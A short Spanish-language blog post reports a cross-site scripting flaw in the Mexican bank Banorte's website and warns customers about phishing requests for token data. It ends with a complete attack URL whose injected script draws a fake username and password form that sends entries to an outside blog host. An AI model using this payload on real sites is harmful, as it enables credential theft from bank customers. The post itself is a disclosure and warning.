Falla de seguridad en Banorte (XSS), «el banco fuerte de México»

Gol14th un Hacker conocido ha detectado una vulnerabilidad XSS en Banorte que sigue activa hasta hoy, esto puede desencadenar varios intentos de fraude por Internet en el cual por ejemplo aparece una pantalla que le solicita al cliente ingresar el número de serie de su token, así como los números que este muestra, con la excusa de que el banco requiere sincronizar el dispositivo (Ataque pishing).

¡Banorte nunca solicita a sus clientes información confidencial como esta!

Por tu seguridad, ignora cualquiera de estas peticiones y no proporciones datos confidenciales como son tus claves de acceso, datos de tu token, o información personal.

Siguiendo estas sencillas recomendaciones, todas tus transacciones por la banca por Internet seguirán siendo siempre seguras.

Ejemplo de un ataque:

http://www.banorte.com/portal/banorte.portal?trends=%3C%2Fscript%3E%3Cscript%3Edocument.write%28%27%3Cp%3EPuchungo%20was%20here%20mtfk%20visita%20blog.puchunguis.com%3A%3C%2Fp%3E%3Cform+method%3D%22GET%22+action%3D%22http%3A%2F%2Fblog.puchunguis.com%22%3E%3Cp%3EUsuario+%3A+%3Cinput+type%3D%22text%22+name%3D%22val1%22+%2F%3E%3C%2Fp%3E%3Cp%3EPassword+%3A+%3Cinput+type%3D%22text%22+name%3D%22val2%22+%2F%3E%3C%2Fp%3E%3Cinput+type%3D%22submit%22+%2F%3E%3C%2Fform%3E%27%29%3B%3C%2Fscript%3E%3Cscript%3E